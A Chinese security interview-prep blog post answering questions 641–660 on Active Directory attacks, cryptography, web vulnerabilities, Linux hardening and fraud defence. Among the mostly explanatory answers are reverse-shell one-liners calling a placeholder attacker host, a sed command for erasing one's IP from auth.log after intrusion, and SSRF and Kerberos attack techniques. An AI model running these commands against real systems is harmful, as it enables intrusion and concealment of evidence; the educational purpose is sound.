安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[641. 假设拿到了某台域机器的权限,但是机器上并没有域账户,应该如何进行域渗透?](#641. 假设拿到了某台域机器的权限,但是机器上并没有域账户,应该如何进行域渗透?)
[642. 域的初始化配置允许任何域用户登录任意加了域的机器,这是为什么?](#642. 域的初始化配置允许任何域用户登录任意加了域的机器,这是为什么?)
[643. 如何查询域管登录过的机器,查询原理又是什么?](#643. 如何查询域管登录过的机器,查询原理又是什么?)
[644. RSA加解密流程](#644. RSA加解密流程)
[645. HTTPS是如何实现的](#645. HTTPS是如何实现的)
[646. 如何防护运营商的DNS劫持/链路劫持](#646. 如何防护运营商的DNS劫持/链路劫持)
[647. 如何防范羊毛党?](#647. 如何防范羊毛党?)
[648. 一个大范围影响的0day被曝光,作为甲方安全工程师,应该如何处理](#648. 一个大范围影响的0day被曝光,作为甲方安全工程师,应该如何处理)
[649. 简述 CTF 攻防赛的流程和一些技巧](#649. 简述 CTF 攻防赛的流程和一些技巧)
[650. 查看当前端口连接的命令有哪些?netstat 和 ss 命令的区别和优缺点;](#650. 查看当前端口连接的命令有哪些?netstat 和 ss 命令的区别和优缺点;)
[651. Linux 服务器的安全运维操作有哪些?如何保护 SSH?](#651. Linux 服务器的安全运维操作有哪些?如何保护 SSH?)
[652. 入侵 Linux 服务器后需要清除哪些日志?](#652. 入侵 Linux 服务器后需要清除哪些日志?)
[653. 一般常反弹哪一种 shell?](#653. 一般常反弹哪一种 shell?)
[654. 介绍渗透测试的流程;](#654. 介绍渗透测试的流程;)
[655. 简要介绍自己常用的扫描器和其实现上的特点;](#655. 简要介绍自己常用的扫描器和其实现上的特点;)
[656. 介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些?](#656. 介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些?)
[657. 如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么?](#657. 如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么?)
[658. 介绍 CSRF 漏洞和常用的防护手段;](#658. 介绍 CSRF 漏洞和常用的防护手段;)
[659. 介绍 SSRF 漏洞,如何深入利用?如何探测非 HTTP 协议?如何防范?](#659. 介绍 SSRF 漏洞,如何深入利用?如何探测非 HTTP 协议?如何防范?)
[660. 如何防范羊毛党(有猫池)?](#660. 如何防范羊毛党(有猫池)?)
641 假设拿到了某台域机器的权限,但是机器上并没有域账户,应该如何进行域渗透? 642 域的初始化配置允许任何域用户登录任意加了域的机器,这是为什么? 643 如何查询域管登录过的机器,查询原理又是什么? 644 RSA加解密流程 645 HTTPS是如何实现的 646 如何防护运营商的DNS劫持/链路劫持 647 如何防范羊毛党? 648 一个大范围影响的0day被曝光,作为甲方安全工程师,应该如何处理 649 简述 CTF 攻防赛的流程和一些技巧 650 查看当前端口连接的命令有哪些?`netstat` 和 `ss` 命令的区别和优缺点; 651 Linux 服务器的安全运维操作有哪些?如何保护 SSH? 652 入侵 Linux 服务器后需要清除哪些日志? 653 一般常反弹哪一种 shell? 654 介绍渗透测试的流程; 655 简要介绍自己常用的扫描器和其实现上的特点; 656 介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些? 657 如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么? 658 介绍 CSRF 漏洞和常用的防护手段; 659 介绍 SSRF 漏洞,如何深入利用?如何探测非 HTTP 协议?如何防范? 660 如何防范羊毛党(有猫池)?641. 假设拿到了某台域机器的权限,但是机器上并没有域账户,应该如何进行域渗透?
在获取了域机器权限但无有效域账户的情况下,域渗透的核心目标是横向移动或提升权限以获取域管凭据。常见策略包括:
- 凭据提取与重用:利用工具(如 Mimikatz)提取内存中的 Kerberos 票据或 NTLM 哈希(Pass-the-Hash 攻击)。即使本地无域账户,系统进程可能缓存域凭据(例如,服务账户或交互式登录会话)。
- 伪造票据攻击:通过 Kerberoasting 或 Golden Ticket 攻击伪造 Kerberos 票据。Golden Ticket 允许以任意用户身份访问域资源,需先获取 KRBTGT 账户哈希(通常通过 DC Sync 攻击实现)。
- 横向移动:扫描内网(如使用 CrackMapExec)寻找脆弱服务(如 SMB、RDP),利用漏洞(如 MS17-010)或传递哈希登录其他域机器。最终目标是定位域控制器(DC)并获取其数据。
- 利用信任关系 :如果机器是域成员,查询域策略(
gpresult /r)或 LDAP 信息(ldapsearch),找出配置错误(如宽松的 ACLs),允许未授权访问域资源。
补充:此场景常见于红队测试,强调最小权限原则的渗透路径,需结合工具链(如 Empire 或 Cobalt Strike)自动化执行。642. 域的初始化配置允许任何域用户登录任意加了域的机器,这是为什么?
此默认行为源于 Active Directory(AD)的便捷性和管理效率,但存在安全风险:
- 设计初衷:AD 的默认组策略(GPO)允许所有域用户登录域内任何机器,以简化用户管理(例如,企业员工可灵活使用共享工作站)。这减少了管理员配置负担,尤其在大规模环境中。
- 安全权衡 :虽然便于协作,却忽略了最小权限原则(PoLP)。攻击者可借此横向移动(如通过 Pass-the-Ticket),因此实际部署时应限制登录权限(如通过 GPO 设置"拒绝本地登录"组)。
补充:Microsoft 将此作为"方便优先"的遗留设计,现代最佳实践推荐启用"受限组"策略或使用 Just Enough Administration(JEA)来限制访问。643. 如何查询域管登录过的机器,查询原理又是什么?
查询域管登录记录是检测高级威胁的关键步骤,常用方法及原理如下:
- 方法 :
- 事件日志分析 :在域控制器(DC)或工作站上查询安全日志(Event ID 4776 或 4624),使用 PowerShell 命令(如
Get-WinEvent)过滤 Domain Admins 组的 SID。- 工具辅助 :使用 AD 查询工具(如 BloodHound)可视化登录路径,或执行 LDAP 查询(
dsquery)检查账户的lastLogon属性。- 原理 :基于 Kerberos 认证机制。当用户登录时,DC 生成 TGT(Ticket Granting Ticket)并记录到事件日志;工作站则缓存登录信息(LSASS 进程)。查询依赖这些日志或缓存,但需注意日志默认保留期短(通常30天),需启用审计策略。
补充:在防御中,此查询常用于检测 Golden Ticket 攻击,原理是异常登录时间或位置(如非 DC 登录)。644. RSA加解密流程
RSA 是一种非对称加密算法,流程基于大数分解难题:
- 密钥生成 :
- 选择两个大质数 pp 和 qq,计算模数 n=p×qn=p×q 和欧拉函数 ϕ(n)=(p−1)(q−1)ϕ(n)=(p−1)(q−1)。
- 选择公钥指数 ee(通常为65537),确保与 ϕ(n)ϕ(n) 互质;计算私钥指数 dd(满足 e×d≡1mod ϕ(n)e×d≡1modϕ(n))。
- 加密:对明文 MM 加密为密文 CC,使用公钥 (e,n)(e,n): C=Memod nC=Memodn。
- 解密 :使用私钥 (d,n)(d,n) 解密密文: M=Cdmod nM=Cdmodn。
补充:RSA 常用于数字签名和密钥交换(如 TLS),但需注意填充方案(如 OAEP)防范攻击;现实中,密钥长度推荐≥2048位。645. HTTPS是如何实现的
HTTPS 通过 TLS/SSL 协议在 HTTP 上实现加密通信,确保数据机密性和完整性:
- 握手阶段 :
- 客户端发送"ClientHello" 提议加密套件;服务器响应"ServerHello" 选择方案并发送证书。
- 客户端验证证书(CA 链可信性),生成预主密钥并用服务器公钥加密发送。
- 双方派生会话密钥(对称密钥),用于后续通信。
- 加密传输:使用会话密钥(如 AES-GCM)加密 HTTP 数据,辅以 HMAC 确保完整性。
- 会话恢复 :支持会话 ID 或 Session Tickets 减少握手开销。
补充:HTTPS 依赖公钥基础设施(PKI),现代实现包括 HTTP/2 或 QUIC 优化性能;漏洞如 Heartbleed 凸显了密钥管理重要性。646. 如何防护运营商的DNS劫持/链路劫持
DNS 劫持(运营商重定向查询)和链路劫持(注入广告或重定向)可通过多层防御缓解:
- 加密 DNS 查询:使用 DNS over HTTPS (DoH) 或 DNS over TLS (DoT) 协议(如 Cloudflare 1.1.1.1),加密查询防止窥探。
- DNSSEC 部署:在域名解析中启用 DNSSEC,通过数字签名验证响应真实性,防止篡改。
- 客户端防护:配置浏览器(如 Chrome 的 Secure DNS 设置)或使用 VPN 加密所有流量,绕过运营商中间件。
- 监控与举报 :定期测试 DNS 泄露(工具如 DNSLeakTest),并向监管机构举报运营商不当行为。
补充:链路劫持还需 HSTS(HTTP Strict Transport Security)强制 HTTPS,防范 SSL Strip 攻击。647. 如何防范羊毛党?
羊毛党通过批量账号薅取优惠,防范需结合技术和业务策略:
- 行为分析:部署 AI 风险引擎(如腾讯云天御),监控异常模式(如高频请求、IP 聚集),实时拦截。
- 多因素认证:引入 CAPTCHA、短信验证或设备绑定,增加自动化攻击成本。
- 规则引擎:设置动态阈值(如新用户首单限制),结合风控系统(如阿里风控大脑)调整策略。
- 数据维度 :关联设备指纹(如 IMEI)、IP 信誉库和社交图谱,识别猫池设备。
补充:羊毛党防御本质是成本博弈,需平衡用户体验与安全;参考电商平台(如淘宝)的实时评分模型。648. 一个大范围影响的0day被曝光,作为甲方安全工程师,应该如何处理
处理 0day 漏洞需快速响应以最小化影响:
- 紧急评估:确认漏洞细节(CVE ID、影响范围),使用扫描器(如 Nessus)检测内部暴露面,并启动事件响应计划。
- 临时缓解:部署 WAF 规则或网络隔离限制攻击面(如禁用脆弱服务);通知员工警惕钓鱼。
- 补丁管理:跟踪厂商补丁,测试后优先修补关键系统(自动化工具有 Ansible)。
- 事后复盘 :分析入侵指标(IoC),更新安全策略(如强化 EDR),并进行红队演练验证。
补充:0day 响应强调协作(如共享 ISAC 情报),平均修复时间(MTTR)应 ≤24 小时。649. 简述 CTF 攻防赛的流程和一些技巧
CTF(Capture The Flag)攻防赛分阶段进行,技巧注重效率和协作:
- 流程 :
- 准备阶段:团队分工(攻击、防守、分析),部署蜜罐和监控工具(如 Splunk)。
- 攻击阶段:快速扫描漏洞(Nmap + Burp Suite),利用已知漏洞(如 Web Shell)夺旗。
- 防守阶段:加固服务(打补丁、禁用无用端口),检测并阻断对手攻击(使用 IDS 如 Snort)。
- 技巧 :
- 自动化脚本(Python PoC)快速利用;
- 专注高分服务(如数据库);
- 实时分享情报(Slack 频道);
- 防守时保留日志取证反击。
补充:CTF 模拟真实攻防,技巧包括"flag 隐藏"(如隐写术)和心理战(干扰对手)。650. 查看当前端口连接的命令有哪些?
netstat和ss命令的区别和优缺点;常用命令包括
netstat、ss、lsof和nmap。重点比较netstat与ss:
netstat:
- 优点:跨平台支持(Windows/Linux),输出易读(
netstat -tuln显示监听端口)。- 缺点:性能低(解析
/proc/net文件),现代 Linux 逐步弃用。ss:
- 优点:直接读取内核数据(速度更快),支持过滤(如
ss -t state established显示活动连接)。- 缺点:语法复杂,旧系统兼容性差。
补充:优先使用ss(Linux 推荐),lsof -i可映射进程,提升运维效率。651. Linux 服务器的安全运维操作有哪些?如何保护 SSH?
安全运维操作覆盖预防与监控:
- 基础加固 :
- 定期更新(
apt update && apt upgrade);- 最小化服务(禁用未使用端口);
- 启用防火墙(iptables/nftables)。
- SSH 保护 :
- 禁用 root 登录(
PermitRootLogin no);- 使用密钥认证(禁用密码);
- 限制 IP 访问(
AllowUsers或 Fail2Ban)。- 监控审计 :配置日志(syslog + auditd),定期扫描漏洞(Lynis)。
补充:SSH 是入口点,保护可减少 90% 暴力破解风险;参考 CIS 基准最佳实践。652. 入侵 Linux 服务器后需要清除哪些日志?
清除日志以掩盖踪迹,关键日志包括:
- 认证日志 :
/var/log/auth.log(记录登录),删除相关条目(如sed -i '/your_ip/d' auth.log)。- 系统日志 :
/var/log/syslog和/var/log/messages(覆盖命令历史)。- Web 日志 :Apache/Nginx 访问日志(如
/var/log/apache2/access.log)。- 审计日志 :
auditd记录(需停止服务后清除)。
补充:彻底清除需覆盖磁盘(shred),但可能触发审计;防御方可通过集中式日志(ELK Stack)预防。653. 一般常反弹哪一种 shell?
反弹 shell(Reverse Shell)是渗透中常用技术,常见类型:
- Bash/Python Shell :简单高效,命令如
bash -i >& /dev/tcp/attacker_ip/port 0>&1。- Netcat Shell :跨平台,
nc -e /bin/sh attacker_ip port。- 加密 Shell :使用 OpenSSL 或 Meterpreter(规避检测)。
补充:选择取决于环境(如受限环境用 Python),反弹 shell 绕过防火墙出站限制。654. 介绍渗透测试的流程;
渗透测试(PenTest)流程结构化分五阶段:
- 侦察(Reconnaissance):被动信息收集(Whois、Shodan),确定目标范围。
- 扫描(Scanning):主动扫描端口(Nmap)、漏洞(Nessus),识别攻击面。
- 利用(Exploitation):利用漏洞获取权限(Metasploit),提升至管理员。
- 后渗透(Post-Exploitation):横向移动、数据窃取(Mimikatz),维持访问。
- 报告(Reporting) :文档化漏洞、风险评级和建议修复方案。
补充:流程遵循 PTES 标准,强调合法授权和最小影响。655. 简要介绍自己常用的扫描器和其实现上的特点;
常用扫描器针对不同场景,特点如下:
- Nmap:网络扫描器,特点为灵活脚本(NSE)和主机发现(SYN 扫描),快速识别开放端口和服务。
- Burp Suite:Web 漏洞扫描器,特点在拦截代理和主动扫描(SQLi/XSS 检测),支持自定义插件。
- Nessus :综合漏洞扫描,特点在庞大插件库(CVE 匹配)和合规检查(CIS),但资源消耗高。
补充:扫描器实现依赖协议分析(Nmap)或模糊测试(Burp),需定期更新规则库。656. 介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些?
SQL 注入(SQLi)是 Web 安全核心威胁:
- 成因 :未过滤用户输入,拼接 SQL 查询(如
"SELECT * FROM users WHERE name='" + userInput + "'"),导致恶意 SQL 执行。- 防范 :
- 参数化查询(预编译语句);
- 输入验证(白名单过滤);
- WAF 规则(如 ModSecurity)。
- 注入方式:Union-based、Error-based、Blind(布尔/时间盲注)。
- 其他利用 :绕过认证、文件读写(LOAD_FILE)、操作系统命令执行(通过
xp_cmdshell)。
补充:SQLi 可导致数据泄露(如 Equifax 事件),防范需 SDLC 集成安全测试。657. 如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么?
XSS(跨站脚本)防范需前后端协同:
- 前端 :输入输出编码(如 JavaScript 的
textContent替代innerHTML),使用框架(React/Vue)自动转义。- 后端 :输入验证(过滤
<script>),输出编码(库如 OWASP ESAPI),部署 CSP(Content Security Policy)限制脚本源。- 优劣 :后端更可靠,因前端可绕过(禁用 JS);但结合 CSP 的前端方案提升用户体验。理想策略是"后端为主,前端为辅",确保深度防御。
补充:XSS 分存储型、反射型和 DOM 型,CSP 能阻断 80% 攻击。658. 介绍 CSRF 漏洞和常用的防护手段;
CSRF(跨站请求伪造)诱使用户执行非意图操作:
- 漏洞原理 :攻击者伪造请求(如恶意图片标签
<img src="http://bank.com/transfer?to=attacker">),用户浏览器自动发送认证 cookie。- 防护手段 :
- CSRF Token:服务器生成唯一 token 嵌入表单,验证请求来源。
- SameSite Cookie:设置 Cookie 属性(
SameSite=Lax)限制跨域请求。- 验证 Referer 头:检查请求来源域是否合法。
补充:CSRF 常与 XSS 结合(如盗取 token),防护需在关键操作(如转账)强制使用。659. 介绍 SSRF 漏洞,如何深入利用?如何探测非 HTTP 协议?如何防范?
SSRF(服务器端请求伪造)使服务器发起内部请求:
- 漏洞成因 :未校验用户提供的 URL(如
http://api?url=internal_ip),导致访问内网资源。- 深入利用 :
- 扫描内网(探测 192.168.x.x);
- 访问 metadata 服务(如 AWS IMDS 窃取凭证);
- 攻击非 HTTP 协议(如
gopher://发送 Redis 命令)。- 探测非 HTTP :使用协议包装(
file:///etc/passwd或dict://),工具(SSRFmap)自动化测试。- 防范 :输入白名单(仅允许公网域名)、网络隔离(禁止服务器访问内网)、使用中间代理验证 URL。
补充:SSRF 可升级为 RCE(如 PHP 的expect://),是云环境高危漏洞。660. 如何防范羊毛党(有猫池)?
针对猫池(批量 SIM 卡设备)的羊毛党,需强化设备级检测:
- 设备指纹:采集 IMEI、MAC 地址和浏览器指纹(如 FingerprintJS),识别重复设备(即使 IP 轮换)。
- 行为生物识别:分析交互模式(鼠标轨迹、输入速度),区分机器人与真人。
- 猫池专项检测:监控短信验证码频率(限制单设备发送量),结合运营商数据验证 SIM 卡真实性。
- 混合验证 :结合 AI 风控(如设备画像)和人工审核(可疑订单复审)。
补充:猫池防御强调"设备唯一性",参考金融行业的智能风控系统(如蚂蚁金服 AlphaRisk),降低误杀率。